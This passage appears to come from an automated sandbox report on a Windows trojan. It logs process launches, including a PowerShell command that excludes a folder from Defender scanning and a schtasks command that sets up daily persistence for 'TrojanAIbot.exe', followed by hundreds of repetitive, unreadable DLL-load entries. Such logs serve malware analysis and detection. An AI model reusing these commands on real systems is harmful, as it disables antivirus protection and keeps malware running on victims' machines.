                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFB9.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\Desktop\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??????p.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
